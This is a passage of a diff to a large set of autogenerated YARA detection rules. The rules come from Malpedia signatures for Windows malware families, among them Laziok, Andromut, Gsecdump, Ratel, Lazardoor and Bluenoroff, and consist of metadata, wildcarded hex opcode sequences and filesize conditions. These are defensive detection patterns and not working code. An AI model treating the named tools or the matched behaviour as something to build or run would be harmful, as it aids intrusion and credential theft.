+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_063"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_063_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "9f59196702302927edbd3dc2784c10dacebf31e2e8430b74641bf84000e5924e"
+		logic_hash = "14c180eecdf0e6fbf2b936d6c444ad58c2e649e1fa770106e8719057ee1aefbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20221118"
+		malpedia_hash = "e0702e2e6d1d00da65c8a29a4ebacd0a4c59e1af"
+		malpedia_version = "20221125"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 740d ffc9 75bf 0fb705???????? eb10 0fb705???????? }
-		$sequence_1 = { 8b15???????? 85d2 7430 8bc7 488d0dfe000200 }
-		$sequence_2 = { b22a 488bcb e8???????? 440fb65f35 4180fb02 750f }
-		$sequence_3 = { 0fb74804 66890b 4883451006 e9???????? 4183fe28 7529 }
-		$sequence_4 = { 7516 48634b3c 4803cb 0fb74114 8b540824 4803d3 8b7c0820 }
-		$sequence_5 = { e8???????? 488d0d3cdaffff e8???????? 488d0d50dbffff e8???????? }
-		$sequence_6 = { c7842418010000ec586548 c784241c0100008b042530 664489ac2420010000 4488ac2422010000 }
-		$sequence_7 = { 8b0d???????? 488bd8 ff15???????? 4883fb01 7466 }
+		$sequence_0 = { 8d43cf 83f819 770c 6689b550030000 e9???????? }
+		$sequence_1 = { 7363 488bf3 4c8d35dfc40100 83e63f 488beb 48c1fd06 48c1e606 }
+		$sequence_2 = { e8???????? 4863f8 488d3588800100 488bcb }
+		$sequence_3 = { 0f11442478 4c8b4708 488d442470 493bc0 7362 488b07 488d4c2470 }
+		$sequence_4 = { 4885c9 7407 48ff25???????? c3 48894c2408 57 4883ec50 }
+		$sequence_5 = { 83f801 7518 488b0d???????? 488d05bf5f0100 483bc8 7405 e8???????? }
+		$sequence_6 = { 8b8c96d0cd0200 8b534c 33c8 0fb6c1 }
+		$sequence_7 = { 0f84e7000000 488b0e 483bc8 740e 4885c9 7406 }
+		$sequence_8 = { 498bc2 418be9 48c1f806 488d0d708c0100 4183e23f 4903e8 }
+		$sequence_9 = { 488d158a5a0200 488bcb e8???????? 85c0 7499 488d157f5a0200 488bcb }
 
 	condition:
-		7 of them and filesize < 794624
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Laziok_Auto : FILE
+rule MALPEDIA_Win_Andromut_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "37e29cbd-65ea-5cba-b131-e7a5cbb3dccc"
+		id = "01d6866f-94d6-5040-b42e-5414ac7b6d42"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.laziok_auto.yar#L1-L97"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.andromut_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "c9f66361581dd6b09edf0f02e114cd674601a3020169deaf28372627acd9b101"
+		logic_hash = "439db6ddaec21c0c7cf9cb5dec8606d00b8cbca3475fe9c3377e8acfff026f82"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127075,30 +127386,32 @@ rule MALPEDIA_Win_Laziok_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 39742410 741b ff742410 ff15???????? 8bf0 85f6 }
-		$sequence_1 = { 59 85f6 7410 46 }
-		$sequence_2 = { ff750c ff7608 ff15???????? eb3f 6a02 58 }
-		$sequence_3 = { 837c240cff 8937 7502 8bf7 5f 8bc6 }
-		$sequence_4 = { 833e01 7513 6a00 ff7510 ff750c }
-		$sequence_5 = { 2bc6 d1f8 83f801 7d03 }
-		$sequence_6 = { 2bc6 d1f8 83f901 7d07 }
-		$sequence_7 = { 7404 8b00 eb03 8b4610 }
+		$sequence_0 = { 7204 8b0e eb02 8bce 807c01fe3d 7501 4a }
+		$sequence_1 = { 8bf9 897de4 33db 895dfc 68???????? 895dec e8???????? }
+		$sequence_2 = { 03c2 83f037 f7d0 83f03b 8bc8 c1e004 c1e904 }
+		$sequence_3 = { 8bc1 c1e106 c1e80a 83e03f 0bc1 }
+		$sequence_4 = { 3dc8000000 756c 33f6 8d8dc8f3ffff }
+		$sequence_5 = { 50 8d85b8ebffff 50 8d8d40e3ffff e8???????? 83bd54e3ffff10 8db540e3ffff }
+		$sequence_6 = { 83c202 663bc6 75f5 2bd1 d1fa 52 56 }
+		$sequence_7 = { 8bd0 8d4d90 e8???????? 85ff 7e52 897d84 8b7d88 }
+		$sequence_8 = { 0fb6c0 0f45c8 3255ff 324dfd 324df4 880e 8aca }
+		$sequence_9 = { b9daf68a50 ab 66ab e8???????? 56 6880000000 }
 
 	condition:
-		7 of them and filesize < 688128
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Rctrl_Auto : FILE
+rule MALPEDIA_Win_Gsecdump_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7ff215c3-2671-5b0b-ba24-88d7d36afa71"
+		id = "ce480a68-e8bd-5d8c-86f5-be48ddeea1ee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rctrl_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gsecdump_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "b0421815065d5d9f7baf76708ca03a7d751899f6c6932dc7218ef3afe98a981a"
+		logic_hash = "a72a04a740244a6cb1848f1152ab924ea33c81fae0f1332c81f641d1b7e5f823"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127112,32 +127425,32 @@ rule MALPEDIA_Win_Rctrl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff75a4 8b4104 8d4dec 51 ff7004 ff15???????? c745a028535700 }
-		$sequence_1 = { 8b0495c8215d00 f644082801 7421 57 e8???????? 59 50 }
-		$sequence_2 = { 8d842454100000 660f13442418 660f13442410 50 660f13442444 ff15???????? 83e802 }
-		$sequence_3 = { 0f85d2000000 8b45b8 85c0 0f85d6020000 0fb64b72 0fb64371 81c900020000 }
-		$sequence_4 = { e8???????? 59 895f34 395f40 740c ff7740 }
-		$sequence_5 = { 56 e8???????? 59 898530fcffff c645fc01 85c0 }
-		$sequence_6 = { 8985c8f6ffff 0f852cfcffff 8b95b4f6ffff 85d2 0f843d010000 8b0495b4155a00 8985ccf6ffff }
-		$sequence_7 = { 33db 57 391e 7438 68???????? ff15???????? }
-		$sequence_8 = { 8d85ece7ffff 6a00 50 68ff030000 8d85fcfbffff 50 ff734c }
-		$sequence_9 = { 50 8d4dc8 e8???????? 85c0 0f84c5070000 895dac c745a870535700 }
+		$sequence_0 = { 83fa10 7202 8b00 8b5314 03d0 39542430 7605 }
+		$sequence_1 = { 894134 5d c21800 8d4104 8b48fc 8b4904 c74401fc???????? }
+		$sequence_2 = { bd10000000 83c408 396c242c 720d 8b442418 50 e8???????? }
+		$sequence_3 = { c6450c00 8b550c 52 8b5510 52 }
+		$sequence_4 = { 81e3fffdffff 837dd010 895d04 720c 8b45bc 50 e8???????? }
+		$sequence_5 = { 50 8d7b10 57 51 }
+		$sequence_6 = { 57 c644242000 8b742420 56 8b742418 56 }
+		$sequence_7 = { 56 8bf0 2bf1 03f2 85c0 89742418 8d69ff }
+		$sequence_8 = { c744241c02000000 742a 8d4704 83c9ff f00fc108 751e 8b17 }
+		$sequence_9 = { e8???????? 8b4604 03c5 50 8d44241c 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 4315136
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Lazardoor_Auto : FILE
+rule MALPEDIA_Win_Ratel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "277a5926-2173-548c-847c-f39b2e42e95f"
+		id = "7eb1cf1a-9399-50f9-a3fb-9725ac6a1e01"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazardoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lazardoor_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ratel_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "7e853d80ccef3940e80ec411ec3cf1794666e4d443e999ba85c896703eb74aa3"
+		logic_hash = "d4d80b213dd2387d65ee9b24a5f750334253f3a710c3a54d1bb71b146d82d823"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127151,32 +127464,32 @@ rule MALPEDIA_Win_Lazardoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7516 488d05530e0100 4a8b04e8 42385cf839 }
-		$sequence_1 = { 488bc8 e8???????? e8???????? 448bc0 c705????????62716365 b867666666 }
-		$sequence_2 = { 0fb60a 83e10f 4a0fbe841188a50100 428a8c1198a50100 482bd0 8b42fc }
-		$sequence_3 = { 410fb609 83e10f 4a0fbe843188a50100 428a8c3198a50100 4c2bc8 }
-		$sequence_4 = { 03d0 8d0492 2bc8 890d???????? 83fb05 0f82f5feffff ba5b540000 }
-		$sequence_5 = { 448d4304 488bce 488d542440 ff15???????? }
-		$sequence_6 = { 0f8531040000 4863693c 4803e9 817d0050450000 0f851d040000 8b5550 41b904000000 }
-		$sequence_7 = { e9???????? 41b880140000 488d1595560200 488d4c2440 e8???????? }
-		$sequence_8 = { 410fb6d3 4c8d0db3c90000 83f201 03d2 8bc2 }
-		$sequence_9 = { 8b1d???????? 41bcffff0000 85db 7440 }
+		$sequence_0 = { 8944240c 8b4584 c744240800000000 89442404 8d45b2 890424 e8???????? }
+		$sequence_1 = { 31ff 8db42600000000 6690 0fb701 89fd 83e902 89c7 }
+		$sequence_2 = { 8b4508 31db 66891e 8b7508 8b00 8b50f4 }
+		$sequence_3 = { 08d0 0f8474060000 c745c800000000 be10000000 c645cc00 8b4d08 8b4108 }
+		$sequence_4 = { 8b4c2454 89442418 8d842418010000 89442414 8b842480010000 896c2404 89442410 }
+		$sequence_5 = { e9???????? 8d4510 8d4d08 bf10000000 890424 8945d0 e8???????? }
+		$sequence_6 = { 8b03 8b5508 837d1401 8d0450 0f84b4000000 8b5514 8b7510 }
+		$sequence_7 = { f7d1 0fafc7 39c1 0f92c1 084dc3 8b4d08 01d0 }
+		$sequence_8 = { 8d8584feffff c7442408ffffffff 8d8d74ffffff c744240408000000 890424 e8???????? 83ec0c }
+		$sequence_9 = { 8b4524 8b55b8 83ec08 8b4db4 8955a0 8b00 3b4da4 }
 
 	condition:
-		7 of them and filesize < 405504
+		7 of them and filesize < 2174976
 }
-rule MALPEDIA_Win_Chinad_Auto : FILE
+rule MALPEDIA_Win_Unidentified_006_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "638e582c-33e3-5dc7-b819-6884369859ac"
+		id = "1d29f273-95a4-58bd-87cd-6ac677036b5c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chinad_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_006_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "0909b63bc06cff243e8fe7a8bed04254856f090009be2422d2270c54ce10717f"
+		logic_hash = "dd723dd2c53afa22a9c28d9c9c06ec724a63cc0cfcf78b59a425b4cdf0fd8bc1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127190,32 +127503,32 @@ rule MALPEDIA_Win_Chinad_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b048588ec4300 ff3401 ff15???????? }
-		$sequence_1 = { 8b9dd0feffff 8b8dc0feffff c1c007 33cb 33d0 23ce }
-		$sequence_2 = { 8b5584 899554ffffff 83bd54ffffff00 750a e8???????? e9???????? c745c4ec284300 }
-		$sequence_3 = { 8b45e0 0facf010 c1e105 0ac8 c1fe10 8b7508 8bc2 }
-		$sequence_4 = { 0b9528fdffff 23b50cfdffff 2395fcfcffff 238d04fdffff 0bf1 8b8534fdffff 238528fdffff }
-		$sequence_5 = { 6a04 8d8df0efffff 51 6a06 8b95f8efffff 52 ff15???????? }
-		$sequence_6 = { 0fa4c117 c1eb09 c1e017 0bf9 8b8d34fdffff 0bd8 }
-		$sequence_7 = { 894de4 6a09 50 e8???????? 8b4ddc 33c8 }
-		$sequence_8 = { 83c108 894d90 8b55ac 8955ec 8b4590 8b4804 }
-		$sequence_9 = { 8b95d8feffff 23fe 0bf8 8bc3 c1c007 89bdd0feffff 018dd0feffff }
+		$sequence_0 = { 3907 7417 833e00 7408 ff36 e8???????? 59 }
+		$sequence_1 = { 6a00 8d45fc 897dfc 50 8d45f8 50 6a00 }
+		$sequence_2 = { 85c9 7410 8b55f4 85d2 7409 e8???????? 894708 }
+		$sequence_3 = { 8bf0 57 56 e8???????? 83c410 33c0 }
+		$sequence_4 = { 85f6 7410 57 8b7d0c 2bf8 }
+		$sequence_5 = { 0fb6875c204000 47 03c6 83c603 25ff000000 }
+		$sequence_6 = { eb45 8b7510 85f6 743c }
+		$sequence_7 = { 8b4dfc 83c40c 8bf7 8bd7 85c9 7421 83ff0c }
+		$sequence_8 = { 33ff 53 ff15???????? 53 ff15???????? }
+		$sequence_9 = { 57 6a40 8bc2 33ff 6800300000 50 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Boxcaon_Auto : FILE
+rule MALPEDIA_Win_Neddnloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a730ae2b-b623-5088-86a7-4d1a4eb89ea5"
+		id = "e15402b8-b469-5172-91e2-075f5a9b23c1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boxcaon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boxcaon_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.neddnloader_auto.yar#L1-L170"
 		license_url = "N/A"
-		logic_hash = "5b71da83cc61472fd3b6239fea0178674ab4b3cf9a9678dbeeda07cdd88e683a"
+		logic_hash = "77a49dc1eddd877e4d25ede9f8b3d2e84b63610bcd03fbfc5a12361b574a00c2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127229,32 +127542,38 @@ rule MALPEDIA_Win_Boxcaon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466890b54000 6a0d e8???????? }
-		$sequence_1 = { 8bd3 66899424e0000000 5a 6a50 66899424e2000000 8bd1 66899424e4000000 }
-		$sequence_2 = { 8888b8b84000 40 ebe6 ff35???????? }
-		$sequence_3 = { 8bec 33c0 8b4d08 3b0cc5408a4000 740a }
-		$sequence_4 = { c78424980000003c000000 ff15???????? 56 33ff }
-		$sequence_5 = { e8???????? 84c0 741a 8d4c2410 8d8424d8020000 2bc1 }
-		$sequence_6 = { 89bc24ac000000 89b424b4000000 c78424980000003c000000 ff15???????? }
-		$sequence_7 = { 33c9 66890c06 68???????? 8d442414 50 e8???????? }
-		$sequence_8 = { 0020 1f 40 00441f40 0023 d18a0688078a 46 }
-		$sequence_9 = { 33c0 c7461407000000 668906 8b4508 8b5810 57 }
+		$sequence_0 = { 8b450c 8908 ff15???????? 8bc7 5f }
+		$sequence_1 = { c3 0fbcc0 8945f8 c1e803 2b45fc }
+		$sequence_2 = { 8b5508 69c0b179379e c1e813 33c9 66890c42 }
+		$sequence_3 = { 7506 83c102 83c202 3bcb }
+		$sequence_4 = { 83c104 83c204 3bcf 72f0 8d43ff 3bc8 7311 }
+		$sequence_5 = { 8bec 83e4f8 81ec10060000 a1???????? 33c4 8984240c060000 }
+		$sequence_6 = { 3bc8 7311 0fb702 0fb731 663bc6 7506 }
+		$sequence_7 = { 7501 41 8bc1 2b45fc 5f }
+		$sequence_8 = { ff15???????? e8???????? 488d1576570000 488d0d4f570000 }
+		$sequence_9 = { 4c8d4530 ba05000020 895d38 ff15???????? 85c0 749b }
+		$sequence_10 = { c1e818 0fb6c8 8bc3 c1eb10 }
+		$sequence_11 = { 4433a48180550100 400fb6c7 8bbd00020000 4433a48180590100 488d2d96d0ffff 4533650c 83ff0a }
+		$sequence_12 = { c1e818 0fb6c8 410fb6c0 4133ac8e803c0100 4133ac8680480100 418bc0 }
+		$sequence_13 = { 4133b48c804d0100 4133b48480590100 418bc0 41337510 c1e808 0fb6d0 418bc3 }
+		$sequence_14 = { 4c8bd2 4c8bd9 48395a10 750a b801000000 }
+		$sequence_15 = { 418bcd 41b981808080 4c8bde 412bcf 418bc1 4889742438 }
 
 	condition:
-		7 of them and filesize < 256000
+		7 of them and filesize < 3438592
 }
-rule MALPEDIA_Win_Romeos_Auto : FILE
+rule MALPEDIA_Win_Anel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb3171da-1b84-5cda-93f9-c750b4ebf760"
+		id = "953c8e23-a017-5b2f-ada2-2a862edfbe44"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.romeos_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anel_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "bf8e366219ae553a8681194274b3fe54bbd7c5cf107fd9635cc89862e4d3fd87"
+		logic_hash = "3d1ba89860b52bc0dc01f6c2b2044c292ec3a194dda9499e849b870d6aa20608"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127268,38 +127587,32 @@ rule MALPEDIA_Win_Romeos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 85c0 0f85ef000000 85db 751d 807c244802 0f85e0000000 }
-		$sequence_1 = { 85c0 0f850d010000 33db 6a16 8d4c244c 6800200000 51 }
-		$sequence_2 = { 6a16 8d4c2420 55 51 57 8bce e8???????? }
-		$sequence_3 = { 33c0 8d7c2449 c644244800 6a16 }
-		$sequence_4 = { 3bdd 7cf2 8b542414 6a16 8d44244c }
-		$sequence_5 = { 8d542414 8d442448 52 50 e8???????? }
-		$sequence_6 = { 50 57 e8???????? 85c0 0f850d010000 }
-		$sequence_7 = { c644241701 50 bd30000000 e8???????? 8bbc2454200000 83c404 }
-		$sequence_8 = { c644245c2e c644245d64 885c245e 885c245f }
-		$sequence_9 = { 89442418 e8???????? 6802020000 55 }
-		$sequence_10 = { 89442410 8b442414 8d542468 52 50 ff15???????? }
-		$sequence_11 = { c644247475 c644247574 884c2476 88442477 }
-		$sequence_12 = { 7508 ff15???????? 8bf0 3b7c2410 7408 }
-		$sequence_13 = { ffd7 8bf0 85f6 7447 8b3d???????? 6820590110 }
-		$sequence_14 = { 8d94241c010000 68ff000000 8d442414 52 }
-		$sequence_15 = { 6a01 51 c744242c0c000000 89742430 895c2434 }
+		$sequence_0 = { 33ff 8db50cffffff e8???????? 6a01 8db5f0feffff e8???????? 6a01 }
+		$sequence_1 = { 8b45d4 7303 8d45d4 8b4de4 50 8d852cffffff }
+		$sequence_2 = { 0394b8480c0000 8b4dfc 334844 335040 8bc1 335508 c1e818 }
+		$sequence_3 = { e8???????? 8bd8 8b8504ffffff c645fc0b e8???????? 33db 43 }
+		$sequence_4 = { 668945d6 6a69 58 6a6e 668945d8 58 6a67 }
+		$sequence_5 = { ffb5606ffeff ffd6 85c0 75c0 8d85646ffeff 50 ff95506ffeff }
+		$sequence_6 = { 6a00 8bc6 e8???????? 84c0 7439 837e1408 7204 }
+		$sequence_7 = { c20800 68???????? e8???????? cc 6a50 b8???????? e8???????? }
+		$sequence_8 = { 51 50 e8???????? 8b44244c 894604 }
+		$sequence_9 = { 0f8e89000000 8b7510 85f6 7e62 ff7514 8d45f8 57 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Bluenoroff_Auto : FILE
+rule MALPEDIA_Win_Lpeclient_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "87ca0fae-dc2d-5a54-9ef5-56b7a04644cb"
+		id = "6292aca0-d7ac-5cd7-a6d4-3438fdd1076c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bluenoroff_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lpeclient"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lpeclient_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "02d8b21ae6c3a55707ae999f347bdd0e2eb71f8cb543624eb25090baef53d3be"
+		logic_hash = "fa5662e58821dbe4e01d6876bcd73f389c9fb3b6d70b4d7afea75bf844e373c6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127313,71 +127626,71 @@ rule MALPEDIA_Win_Bluenoroff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 68ffff0000 50 e8???????? 8b4508 83c41c 83f801 750e }
-		$sequence_1 = { 68ffff0000 50 e8???????? 33c0 83c41c 8d95ecfffeff 33c9 }
-		$sequence_2 = { 8bec b804000100 e8???????? a1???????? 33c5 8945fc 68ffff0000 }
-		$sequence_3 = { 8b45f8 40 81c348040000 8945f8 3b45ec 7c8e }
-		$sequence_4 = { b8b9757907 f7e2 c1ea05 83c40c 8955ec 895df8 3bd3 }
-		$sequence_5 = { 885431ff 0fb6550b 881430 81f900010000 7ccb 5f }
-		$sequence_6 = { 83c40c 8955ec 895df8 3bd3 }
-		$sequence_7 = { 8bf0 83c408 85f6 743a 8d85fcfffeff 50 }
-		$sequence_8 = { a1???????? 33c5 8945fc 56 68ffff0000 8d85fdfffeff 6a00 }
-		$sequence_9 = { 83c709 57 894e04 e8???????? 83c40c }
+		$sequence_0 = { 33d2 897590 e8???????? 488d8dc2000000 33d2 }
+		$sequence_1 = { 33d2 41b808040000 e8???????? 488bcf ff15???????? 488bce ff15???????? }
+		$sequence_2 = { 488d0df74e0100 ff15???????? 488d0d9a480100 ff15???????? }
+		$sequence_3 = { ff15???????? 488d4de0 33d2 41b808040000 488bd8 e8???????? 488d4de0 }
+		$sequence_4 = { ff15???????? 488d9500040000 488bc8 ff15???????? 488d4de0 33d2 }
+		$sequence_5 = { 4885c0 753b 488d4dd0 488d45d0 488b15???????? 482bd0 666666660f1f840000000000 }
+		$sequence_6 = { c7451072007500 c7451473005000 c7451872006f00 c7451c64007500 c7452063007400 66894524 }
+		$sequence_7 = { c7451c64007500 c7452063007400 66894524 c745b872006f00 c745bc6f007400 c745c05c005300 c745c465006300 }
+		$sequence_8 = { 85c0 74dc 4c8d85a0070000 488d1504f70000 }
+		$sequence_9 = { 85c0 0f8e87140000 48895c2470 48896c2450 4d8d6208 4c89742438 4c8d5702 }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 289792
 }
-rule MALPEDIA_Win_Mariposa_Auto : FILE
+rule MALPEDIA_Win_Unidentified_102_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a3a2192-1985-5afb-a3c8-457f3f4c729c"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mariposa_auto.yar#L1-L118"
+		id = "68f5ede2-e772-5b9c-86c7-72da7d6ddaff"
+		date = "2023-07-11"
+		modified = "2023-07-15"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_102_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "343ac33f57cd9cc9bfc1841bf1bd211734de245f417ee554220587a46ed4086f"
+		logic_hash = "7cf959abf8b06a75a101a66334f27ae5601df812c1ddb140fd9298ef735bb0dc"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20230705"
+		malpedia_hash = "42d0574f4405bd7d2b154d321d345acb18834a41"
+		malpedia_version = "20230715"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 8bec 53 56 bb???????? 43 }
-		$sequence_1 = { ffd3 33c0 50 e8???????? 33c0 }
-		$sequence_2 = { 53 56 bb???????? 43 }
-		$sequence_3 = { 885c0cff e2f1 ba???????? 2bd6 8bdc 03da 4b }
-		$sequence_4 = { 8a1c0e 02d8 32dc fec0 885c0cff e2f1 }
-		$sequence_5 = { 8bdc 03da 4b 54 ffd3 33c0 }
-		$sequence_6 = { 885c0cff e2f1 ba???????? 2bd6 }
-		$sequence_7 = { 8a4301 8a6302 f6d0 02c4 d0f8 8a1c0e }
-		$sequence_8 = { 53 56 bb???????? 43 803b00 }
-		$sequence_9 = { 03da 4b 54 ffd3 33c0 }
+		$sequence_0 = { 6bd238 8b0c8d187b0410 88441129 8b0b 8bc1 c1f806 }
+		$sequence_1 = { 83c408 8bb5e8fdffff 8dbdd8fdffff 83bdecfdffff10 c745b000000000 0f43bdd8fdffff }
+		$sequence_2 = { 8bf3 6bf938 c1fe06 6a00 8b0cb5187b0410 ff740f24 }
+		$sequence_3 = { 894610 c7461407000000 668906 e9???????? 837f1410 8bcf 7202 }
+		$sequence_4 = { c785e4fbffff07000000 8d5102 668985d0fbffff 6690 668b01 83c102 6685c0 }
+		$sequence_5 = { 8d85e8e7ffff 68???????? 50 ff15???????? 83c410 8d8594e7ffff 50 }
+		$sequence_6 = { 0f1085b0fcffff 0f1100 8bc4 0f108590fcffff 51 0f1100 ff5228 }
+		$sequence_7 = { 83c408 8b95dcfeffff 83fa10 722f 8b8dc8feffff 42 8bc1 }
+		$sequence_8 = { 6a00 68???????? 6802000080 c785c8e7ffff3f000f00 ff15???????? 85c0 0f84ef000000 }
+		$sequence_9 = { 8d45f4 64a300000000 8965f0 8b4510 8b4d18 8b5d0c }
 
 	condition:
-		7 of them and filesize < 311296
+		7 of them and filesize < 626688
 }
-rule MALPEDIA_Win_Sagerunex_Auto : FILE
+rule MALPEDIA_Win_Pickpocket_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a425b22d-b4f2-5d55-8ad8-71f79a62d46d"
+		id = "7a83df77-97f7-5782-8335-b4e0f4f4d0cb"
